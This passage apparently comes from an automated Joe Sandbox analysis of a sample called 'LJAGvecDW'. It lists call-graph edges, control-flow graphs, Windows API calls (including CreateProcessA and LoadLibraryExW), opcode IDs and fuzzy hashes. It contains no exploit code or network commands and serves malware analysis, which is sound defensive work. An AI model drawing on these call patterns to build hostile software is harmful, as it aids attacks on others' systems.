63157->63158 63159 25cc532 63158->63159 63160 25c951c GetWindowWord 63159->63160 63161 25cc6a4 63160->63161 63162 25c951c GetWindowWord 63161->63162 63163 25cc82f 63162->63163 63164 25c951c GetWindowWord 63163->63164 63165 25ccabd 63164->63165 63166 25c951c GetWindowWord 63165->63166 63167 25ccbdf 63166->63167 63168 25c951c GetWindowWord 63167->63168 63169 25ccd1c 63168->63169 63170 25c951c GetWindowWord 63169->63170 63171 25cce0f 63170->63171 63172 25c951c GetWindowWord 63171->63172 63173 25ccf7f 63172->63173 63174 25c951c GetWindowWord 63173->63174 63175 25cd072 63174->63175 63176 25c951c GetWindowWord 63175->63176 63177 25cd1c8 63176->63177 63178 25c951c GetWindowWord 63177->63178 63180 25cd29e 63178->63180 63179 25c951c GetWindowWord 63181 25cd528 63179->63181 63180->63179 63182 25c951c GetWindowWord 63181->63182 63183 25cd6e9 63182->63183 63184 25c951c GetWindowWord 63183->63184 63185 25cd92d 63184->63185 63186 25c951c GetWindowWord 63185->63186 63187 25cdc0a 63186->63187 63188 25c951c GetWindowWord 63187->63188 63189 25cdd13 63188->63189 63190 25c951c GetWindowWord 63189->63190 63191 25cde69 63190->63191 63192 25c951c GetWindowWord 63191->63192 63193 25cdf3f 63192->63193 63194 25c951c GetWindowWord 63193->63194 63195 25ce02f 63194->63195 63196 25c951c GetWindowWord 63195->63196 63197 25ce139 63196->63197 63198 25c951c GetWindowWord 63197->63198 63199 25ce364 63198->63199 63200 25c951c GetWindowWord 63199->63200 63201 25ce46a 63200->63201 63202 25c951c GetWindowWord 63201->63202 63203 25ce573 63202->63203 63204 25c951c GetWindowWord 63203->63204 63205 25ce6c9 63204->63205 63206 25c951c GetWindowWord 63205->63206 63207 25ce79f 63206->63207 63208 25c951c GetWindowWord 63207->63208 63209 25ce88f 63208->63209 63210 25c951c GetWindowWord 63209->63210 63211 25ce999 63210->63211 63212->63141 63213->63141 63216->63136 63217->63136 63218->63117 63219->63117 63220->63117 63222 4d30e58 63221->63222 63224 4d30f6c 63222->63224 63235 2609bd8 63222->63235 63249 2609bc9 63222->63249 63223 4d30ed1 63223->63114 63224->63114 63228 4d30e71 63227->63228 63229 4d30f6c 63228->63229 63231 2609bd8 GetCurrentThreadId 63228->63231 63232 2609bc9 GetCurrentThreadId 63228->63232 63229->63114 63230 4d30ed1 63230->63114 63231->63230 63232->63230 63234 25c9527 GetWindowWord 63233->63234 63236 2609c03 63235->63236 63237 2609bfc 63235->63237 63242 2609c56 63236->63242 63263 2606d84 63236->63263 63237->63223 63240 2606d84 GetCurrentThreadId 63241 2609c2a 63240->63241 63241->63242 63267 4d311e8 63241->63267 63273 4d311d9 63241->63273 63279 260a128 63241->63279 63288 260a102 63241->63288 63297 4d3af48 63241->63297 63302 4d3af38 63241->63302 63242->63223 63250 2609c03 63249->63250 63251 2609bfc 63249->63251 63252 2606d84 GetCurrentThreadId 63250->63252 63256 2609c56 63250->63256 63251->63223 63253 2609c20 63252->63253 63254 2606d84 GetCurrentThreadId 63253->63254 63255 2609c2a 63254->63255 63255->63256 63257 260a102 GetCurrentThreadId 63255->63257 63258 260a128 GetCurrentThreadId 63255->63258 63259 4d311d9 GetCurrentThreadId 63255->63259 63260 4d311e8 GetCurrentThreadId 63255->63260 63261 4d3af48 GetCurrentThreadId 63255->63261 63262 4d3af38 GetCurrentThreadId 63255->63262 63256->63223 63257->63256 63258->63256 63259->63256 63260->63256 63261->63256 63262->63256 63264 2606d8f 63263->63264 63265 2609f3f GetCurrentThreadId 63264->63265 63266 2609c20 63264->63266 63265->63266 63266->63240 63268 4d311f5 63267->63268 63270 4d31212 63268->63270 63271 260a102 GetCurrentThreadId 63268->63271 63272 260a128 GetCurrentThreadId 63268->63272 63269 4d3120e 63269->63242 63270->63242 63271->63269 63272->63269 63274 4d311f5 63273->63274 63276 4d31212 63274->63276 63277 260a102 GetCurrentThreadId 63274->63277 63278 260a128 GetCurrentThreadId 63274->63278 63275 4d3120e 63275->63242 63276->63242 63277->63275 63278->63275 63280 260a149 63279->63280 63282 260a1cb 63280->63282 63283 4d311d9 GetCurrentThreadId 63280->63283 63284 4d311e8 GetCurrentThreadId 63280->63284 63281 260a191 63281->63282 63307 4d32fd7 63281->63307 63314 4d32f30 63281->63314 63320 4d32f1f 63281->63320 63282->63242 63283->63281 63284->63281 63289 260a149 63288->63289 63291 260a1cb 63289->63291 63295 4d311d9 GetCurrentThreadId 63289->63295 63296 4d311e8 GetCurrentThreadId 63289->63296 63290 260a191 63290->63291 63292 4d32f30 GetCurrentThreadId 63290->63292 63293 4d32fd7 GetCurrentThreadId 63290->63293 63294 4d32f1f GetCurrentThreadId 63290->63294 63291->63242 63292->63291 63293->63291 63294->63291 63295->63290 63296->63290 63298 4d3af5d 63297->63298 63300 260a102 GetCurrentThreadId 63298->63300 63301 260a128 GetCurrentThreadId 63298->63301 63299 4d3af6e 63299->63242 63300->63299 63301->63299 63303 4d3af48 63302->63303 63305 260a102 GetCurrentThreadId 63303->63305 63306 260a128 GetCurrentThreadId 63303->63306 63304 4d3af6e 63304->63242 63305->63304 63306->63304 63308 4d32f49 63307->63308 63310 4d32fdb 63307->63310 63311 4d32f93 63308->63311 63312 2609bd8 GetCurrentThreadId 63308->63312 63313 2609bc9 GetCurrentThreadId 63308->63313 63309 4d32f52 63309->63282 63310->63282 63311->63282 63312->63309 63313->63309 63315 4d32f45 63314->63315 63317 4d32f56 63315->63317 63318 2609bd8 GetCurrentThreadId 63315->63318 63319 2609bc9 GetCurrentThreadId 63315->63319 63316 4d32f52 63316->63282 63317->63282 63318->63316 63319->63316 63321 4d32f30 63320->63321 63323 4d32f56 63321->63323 63324 2609bd8 GetCurrentThreadId 63321->63324 63325 2609bc9 GetCurrentThreadId 63321->63325 63322 4d32f52 63322->63282 63323->63282 63324->63322 63325->63322 63378 25c2810 63379 25c2878 CreateWindowExW 63378->63379 63381 25c2934 63379->63381 63326 25c4dd2 63327 25c4ecc 63326->63327 63328 25c4e22 63326->63328 63332 25c1c9c 63327->63332 63329 25c4e7a CallWindowProcW 63328->63329 63331 25c4e29 63328->63331 63329->63331 63333 25c1ca7 63332->63333 63335 25c3789 63333->63335 63336 25c1dc4 CallWindowProcW 63333->63336 63335->63335 63336->63335 63382 afdf60 63383 afdfa6 GetCurrentProcess 63382->63383 63385 afdff8 GetCurrentThread 63383->63385 63386 afdff1 63383->63386 63387 afe02e 63385->63387 63388 afe035 GetCurrentProcess 63385->63388 63386->63385 63387->63388 63389 afe06b 63388->63389 63390 afe093 GetCurrentThreadId 63389->63390 63391 afe0c4 63390->63391 63577 afbbd0 63578 afbbdf 63577->63578 63580 afbcb8 63577->63580 63581 afbcd9 63580->63581 63582 afbcfc 63580->63582 63581->63582 63588 afbf60 63581->63588 63592 afbf50 63581->63592 63582->63578 63583 afbcf4 63583->63582 63584 afbf00 GetModuleHandleW 63583->63584 63585 afbf2d 63584->63585 63585->63578 63589 afbf74 63588->63589 63590 afbf99 63589->63590 63596 afb6c8 63589->63596 63590->63583 63593 afbf74 63592->63593 63594 afb6c8 LoadLibraryExW 63593->63594 63595 afbf99 63593->63595 63594->63595 63595->63583 63597 afc140 LoadLibraryExW 63596->63597 63599 afc1b9 63597->63599 63599->63590
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tIh
                                                  • API String ID: 0-443931868
                                                  • Opcode ID: 0018aa5c238d90504dcd5059f0f184c2acc40e8982cb90253520628450742ab3
                                                  • Instruction ID: ae33eaa616fac9a2361070f3c4638305e9d0c8d18f9df3e2ed32756735f841b5
                                                  • Opcode Fuzzy Hash: 0018aa5c238d90504dcd5059f0f184c2acc40e8982cb90253520628450742ab3
                                                  • Instruction Fuzzy Hash: CAD12670E0424ADFDB44CF95D5908EEFBB2FF89300B20A559D556AB228D734EA42CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )"
                                                  • API String ID: 0-4237191880
                                                  • Opcode ID: 44b82ecd04f5dbc7a88b0282b11a548e972b1078ad75bcc73b8b1de78ad0a851
                                                  • Instruction ID: 179a2d3103cc7ccc85b019e645cc52599abc60fe4d8e8f71829808142c1498e0
                                                  • Opcode Fuzzy Hash: 44b82ecd04f5dbc7a88b0282b11a548e972b1078ad75bcc73b8b1de78ad0a851
                                                  • Instruction Fuzzy Hash: 6F81B574E04209DFDB44CFAAC944AEEBBB2FF88300F24942AD51AAB358D7359945CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452662796.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_6db0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01707b91547cdbd058fbfabe63199325323ac0b5795691ef4689b1237c5d8160
                                                  • Instruction ID: 63588c824694bf583988bbf8e85f082ef400a964a281de861f42353cc9dc69d8
                                                  • Opcode Fuzzy Hash: 01707b91547cdbd058fbfabe63199325323ac0b5795691ef4689b1237c5d8160
                                                  • Instruction Fuzzy Hash: 4D811174E14219DFDF44CFA9C980AEEFBB2FB88201F10A51AD456B7218D3349902CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00AFDFDE
                                                  • GetCurrentThread.KERNEL32 ref: 00AFE01B
                                                  • GetCurrentProcess.KERNEL32 ref: 00AFE058
                                                  • GetCurrentThreadId.KERNEL32 ref: 00AFE0B1
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 4f05c9b9e63ce4261d70a3ed4a0d514db47ab9b316b6d7bf061937557590d3c8
                                                  • Instruction ID: 437cf08e04d87c8328a190ccba03948629c28e4ccc02e4c2b8d8407e1401dc19
                                                  • Opcode Fuzzy Hash: 4f05c9b9e63ce4261d70a3ed4a0d514db47ab9b316b6d7bf061937557590d3c8
                                                  • Instruction Fuzzy Hash: 955154B090124ACFDB14CFAAD548BEEFBF1FF88314F208459E509A7260DBB59944CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00AFDFDE
                                                  • GetCurrentThread.KERNEL32 ref: 00AFE01B
                                                  • GetCurrentProcess.KERNEL32 ref: 00AFE058
                                                  • GetCurrentThreadId.KERNEL32 ref: 00AFE0B1
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 2b2ce0683ef5a08480fee1362855ae9223234e2d1090e7784931867b5932a6b3
                                                  • Instruction ID: 5c7bf45972262c9ef63f9d81e9efd64d0f005cad141d79cc0bf79e181969c69a
                                                  • Opcode Fuzzy Hash: 2b2ce0683ef5a08480fee1362855ae9223234e2d1090e7784931867b5932a6b3
                                                  • Instruction Fuzzy Hash: F65134B090134A8FDB14CFAAD548BEEFBF1FF88314F208459E509A7260DBB59944CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2424 84b612c-84b61cd 2426 84b61cf-84b61d9 2424->2426 2427 84b6206-84b6226 2424->2427 2426->2427 2428 84b61db-84b61dd 2426->2428 2434 84b6228-84b6232 2427->2434 2435 84b625f-84b628e 2427->2435 2429 84b61df-84b61e9 2428->2429 2430 84b6200-84b6203 2428->2430 2432 84b61eb 2429->2432 2433 84b61ed-84b61fc 2429->2433 2430->2427 2432->2433 2433->2433 2436 84b61fe 2433->2436 2434->2435 2437 84b6234-84b6236 2434->2437 2443 84b6290-84b629a 2435->2443 2444 84b62c7-84b6381 CreateProcessA 2435->2444 2436->2430 2439 84b6259-84b625c 2437->2439 2440 84b6238-84b6242 2437->2440 2439->2435 2441 84b6246-84b6255 2440->2441 2442 84b6244 2440->2442 2441->2441 2445 84b6257 2441->2445 2442->2441 2443->2444 2446 84b629c-84b629e 2443->2446 2455 84b638a-84b6410 2444->2455 2456 84b6383-84b6389 2444->2456 2445->2439 2448 84b62c1-84b62c4 2446->2448 2449 84b62a0-84b62aa 2446->2449 2448->2444 2450 84b62ae-84b62bd 2449->2450 2451 84b62ac 2449->2451 2450->2450 2453 84b62bf 2450->2453 2451->2450 2453->2448 2466 84b6412-84b6416 2455->2466 2467 84b6420-84b6424 2455->2467 2456->2455 2466->2467 2468 84b6418 2466->2468 2469 84b6426-84b642a 2467->2469 2470 84b6434-84b6438 2467->2470 2468->2467 2469->2470 2473 84b642c 2469->2473 2471 84b643a-84b643e 2470->2471 2472 84b6448-84b644c 2470->2472 2471->2472 2474 84b6440 2471->2474 2475 84b645e-84b6465 2472->2475 2476 84b644e-84b6454 2472->2476 2473->2470 2474->2472 2477 84b647c 2475->2477 2478 84b6467-84b6476 2475->2478 2476->2475 2480 84b647d 2477->2480 2478->2477 2480->2480
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 084B636E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 9cf7e8aa688f2614f18ccc1f76ed83d10c604991fdd0ce66d4ef29956f0b575c
                                                  • Instruction ID: a8b38256ae1d3b5bbd7635f18816484459af5700e5a9de2c93af8a78adb03ef5
                                                  • Opcode Fuzzy Hash: 9cf7e8aa688f2614f18ccc1f76ed83d10c604991fdd0ce66d4ef29956f0b575c
                                                  • Instruction Fuzzy Hash: F9A16D71D00619CFEF14DFA8C9417EEBBB2BF48311F1581AAE808A7250DB749985CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2481 84b6138-84b61cd 2483 84b61cf-84b61d9 2481->2483 2484 84b6206-84b6226 2481->2484 2483->2484 2485 84b61db-84b61dd 2483->2485 2491 84b6228-84b6232 2484->2491 2492 84b625f-84b628e 2484->2492 2486 84b61df-84b61e9 2485->2486 2487 84b6200-84b6203 2485->2487 2489 84b61eb 2486->2489 2490 84b61ed-84b61fc 2486->2490 2487->2484 2489->2490 2490->2490 2493 84b61fe 2490->2493 2491->2492 2494 84b6234-84b6236 2491->2494 2500 84b6290-84b629a 2492->2500 2501 84b62c7-84b6381 CreateProcessA 2492->2501 2493->2487 2496 84b6259-84b625c 2494->2496 2497 84b6238-84b6242 2494->2497 2496->2492 2498 84b6246-84b6255 2497->2498 2499 84b6244 2497->2499 2498->2498 2502 84b6257 2498->2502 2499->2498 2500->2501 2503 84b629c-84b629e 2500->2503 2512 84b638a-84b6410 2501->2512 2513 84b6383-84b6389 2501->2513 2502->2496 2505 84b62c1-84b62c4 2503->2505 2506 84b62a0-84b62aa 2503->2506 2505->2501 2507 84b62ae-84b62bd 2506->2507 2508 84b62ac 2506->2508 2507->2507 2510 84b62bf 2507->2510 2508->2507 2510->2505 2523 84b6412-84b6416 2512->2523 2524 84b6420-84b6424 2512->2524 2513->2512 2523->2524 2525 84b6418 2523->2525 2526 84b6426-84b642a 2524->2526 2527 84b6434-84b6438 2524->2527 2525->2524 2526->2527 2530 84b642c 2526->2530 2528 84b643a-84b643e 2527->2528 2529 84b6448-84b644c 2527->2529 2528->2529 2531 84b6440 2528->2531 2532 84b645e-84b6465 2529->2532 2533 84b644e-84b6454 2529->2533 2530->2527 2531->2529 2534 84b647c 2532->2534 2535 84b6467-84b6476 2532->2535 2533->2532 2537 84b647d 2534->2537 2535->2534 2537->2537
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 084B636E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2452917737.00000000084B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_84b0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 0c4ef1656bc2d9363ccaf5a6bb8743d7a69626a1647d572de5ad5f02ecd5552c
                                                  • Instruction ID: 275550d0dff8ff8fd8dc996e4a01aee0cee097eee2659eb55365a5cf715551cc
                                                  • Opcode Fuzzy Hash: 0c4ef1656bc2d9363ccaf5a6bb8743d7a69626a1647d572de5ad5f02ecd5552c
                                                  • Instruction Fuzzy Hash: 26915C71D00619CFEF24DFA8C9417EEBBB2BF48315F15816AE808A7240DB759985CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2538 afbcb8-afbcd7 2539 afbcd9-afbce6 call af921c 2538->2539 2540 afbd03-afbd07 2538->2540 2546 afbcfc 2539->2546 2547 afbce8 2539->2547 2542 afbd1b-afbd5c 2540->2542 2543 afbd09-afbd13 2540->2543 2549 afbd5e-afbd66 2542->2549 2550 afbd69-afbd77 2542->2550 2543->2542 2546->2540 2595 afbcee call afbf60 2547->2595 2596 afbcee call afbf50 2547->2596 2549->2550 2551 afbd9b-afbd9d 2550->2551 2552 afbd79-afbd7e 2550->2552 2557 afbda0-afbda7 2551->2557 2554 afbd89 2552->2554 2555 afbd80-afbd87 call afb66c 2552->2555 2553 afbcf4-afbcf6 2553->2546 2556 afbe38-afbef8 2553->2556 2559 afbd8b-afbd99 2554->2559 2555->2559 2588 afbefa-afbefd 2556->2588 2589 afbf00-afbf2b GetModuleHandleW 2556->2589 2560 afbda9-afbdb1 2557->2560 2561 afbdb4-afbdbb 2557->2561 2559->2557 2560->2561 2564 afbdbd-afbdc5 2561->2564 2565 afbdc8-afbdd1 call afb67c 2561->2565 2564->2565 2569 afbdde-afbde3 2565->2569 2570 afbdd3-afbddb 2565->2570 2571 afbde5-afbdec 2569->2571 2572 afbe01-afbe05 2569->2572 2570->2569 2571->2572 2574 afbdee-afbdfe call afb68c call afb69c 2571->2574 2593 afbe08 call afc230 2572->2593 2594 afbe08 call afc260 2572->2594 2574->2572 2577 afbe0b-afbe0e 2579 afbe31-afbe37 2577->2579 2580 afbe10-afbe2e 2577->2580 2580->2579 2588->2589 2590 afbf2d-afbf33 2589->2590 2591 afbf34-afbf48 2589->2591 2590->2591 2593->2577 2594->2577 2595->2553 2596->2553
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00AFBF1E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 6d2ebe39efcdda65b715f237ca00865a985af37f0aca563d9a87ccd03ffae014
                                                  • Instruction ID: 3baff4e4e8e0f76da2224d852dd474a020a52b5823829a9e15b9f48b83277fd5
                                                  • Opcode Fuzzy Hash: 6d2ebe39efcdda65b715f237ca00865a985af37f0aca563d9a87ccd03ffae014
                                                  • Instruction Fuzzy Hash: E4817970A00B098FDB64CF69D4457AABBF1FF88304F00892DE586D7A51DB74E805CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2597 25c2804-25c2876 2598 25c2878-25c287e 2597->2598 2599 25c2881-25c2888 2597->2599 2598->2599 2600 25c288a-25c2890 2599->2600 2601 25c2893-25c28cb 2599->2601 2600->2601 2602 25c28d3-25c2932 CreateWindowExW 2601->2602 2603 25c293b-25c2973 2602->2603 2604 25c2934-25c293a 2602->2604 2608 25c2975-25c2978 2603->2608 2609 25c2980 2603->2609 2604->2603 2608->2609 2610 25c2981 2609->2610 2610->2610
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 025C2922
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2446332103.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_25c0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 17a50f379483379693fa30156d3938735503d521a2edecf60de38c37237237db
                                                  • Instruction ID: c65ccaf6af19880c23752283d95658b9f3ad5dcb6c46b7c6add1e0c9742a11f2
                                                  • Opcode Fuzzy Hash: 17a50f379483379693fa30156d3938735503d521a2edecf60de38c37237237db
                                                  • Instruction Fuzzy Hash: C351CFB1D003499FDB14CFA9C884ADEBFF5BF48314F24812AE819AB210D7759885CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2611 25c2810-25c2876 2612 25c2878-25c287e 2611->2612 2613 25c2881-25c2888 2611->2613 2612->2613 2614 25c288a-25c2890 2613->2614 2615 25c2893-25c2932 CreateWindowExW 2613->2615 2614->2615 2617 25c293b-25c2973 2615->2617 2618 25c2934-25c293a 2615->2618 2622 25c2975-25c2978 2617->2622 2623 25c2980 2617->2623 2618->2617 2622->2623 2624 25c2981 2623->2624 2624->2624
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 025C2922
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2446332103.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_25c0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 637f712606f07c84d01d33a94105a96ac8f3375e2ab00bcfdf84c2f72d515ae4
                                                  • Instruction ID: 3d0e3363708d3d2e3a79aeb65766ffcbb9a67e0e4c0936710ba659ecd5de4625
                                                  • Opcode Fuzzy Hash: 637f712606f07c84d01d33a94105a96ac8f3375e2ab00bcfdf84c2f72d515ae4
                                                  • Instruction Fuzzy Hash: 1041ADB1D003499FDB14CF9AC884ADEBBF5BF48310F24912AE919AB210D775A885CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2625 25c1dc4-25c4e1c 2628 25c4ecc-25c4eec call 25c1c9c 2625->2628 2629 25c4e22-25c4e27 2625->2629 2637 25c4eef-25c4efc 2628->2637 2630 25c4e29-25c4e60 2629->2630 2631 25c4e7a-25c4eb2 CallWindowProcW 2629->2631 2638 25c4e69-25c4e78 2630->2638 2639 25c4e62-25c4e68 2630->2639 2633 25c4ebb-25c4eca 2631->2633 2634 25c4eb4-25c4eba 2631->2634 2633->2637 2634->2633 2638->2637 2639->2638
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 025C4EA1
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2446332103.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_25c0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: fc481adcb12dd58e554ce06c990a5d23e4eecd7ff0984ed97e67458d0bbbbe1f
                                                  • Instruction ID: 1aa0c2a1ca227ca9594f770b794efd73c18ae052d12e8622159e3f823465b8b9
                                                  • Opcode Fuzzy Hash: fc481adcb12dd58e554ce06c990a5d23e4eecd7ff0984ed97e67458d0bbbbe1f
                                                  • Instruction Fuzzy Hash: 2B4117B8A00209CFDB14CF99C448BABBBF5FB88314F25C859D519A7321E775A840CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2642 af4538-af5dd9 CreateActCtxA 2645 af5ddb-af5de1 2642->2645 2646 af5de2-af5e3c 2642->2646 2645->2646 2653 af5e3e-af5e41 2646->2653 2654 af5e4b-af5e4f 2646->2654 2653->2654 2655 af5e51-af5e5d 2654->2655 2656 af5e60 2654->2656 2655->2656 2658 af5e61 2656->2658 2658->2658
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00AF5DC9
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: c23f1704a89e7fbcc4c170a15086b51d981fdd8805845dc35fc60f451355e7c2
                                                  • Instruction ID: a6c5698caebce7649ea7a666177e10f1a539f2b873d4f1117d69ad46da95117d
                                                  • Opcode Fuzzy Hash: c23f1704a89e7fbcc4c170a15086b51d981fdd8805845dc35fc60f451355e7c2
                                                  • Instruction Fuzzy Hash: ED41BF70C0471DCBEB24CFA9C944B9EFBB5BF48704F20816AE608AB255DB756945CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2659 af5d0d-af5dd9 CreateActCtxA 2661 af5ddb-af5de1 2659->2661 2662 af5de2-af5e3c 2659->2662 2661->2662 2669 af5e3e-af5e41 2662->2669 2670 af5e4b-af5e4f 2662->2670 2669->2670 2671 af5e51-af5e5d 2670->2671 2672 af5e60 2670->2672 2671->2672 2674 af5e61 2672->2674 2674->2674
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00AF5DC9
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2443785235.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_af0000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 9db7ba519429533a839a5e551ab6bdf354728c02c25750ade9aa736a8f29c085
                                                  • Instruction ID: e4658e216f10b1587d2e27b512fac2e172ae7c2c85fb9ae577fb86da5f8c023a
                                                  • Opcode Fuzzy Hash: 9db7ba519429533a839a5e551ab6bdf354728c02c25750ade9aa736a8f29c085
                                                  • Instruction Fuzzy Hash: 9041EFB0C0071DCBEB24CFA9C844BDEBBB5BF89304F20816AD508AB251DB756946CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2675 4d39ed8-4d39f2c 2677 4d39f37-4d39f46 2675->2677 2678 4d39f2e-4d39f34 2675->2678 2679 4d39f4b-4d39f84 DrawTextExW 2677->2679 2680 4d39f48 2677->2680 2678->2677 2681 4d39f86-4d39f8c 2679->2681 2682 4d39f8d-4d39faa 2679->2682 2680->2679 2681->2682
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D39EC5,?,?), ref: 04D39F77
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.2451002409.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_4d30000_LJAGvecDW.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
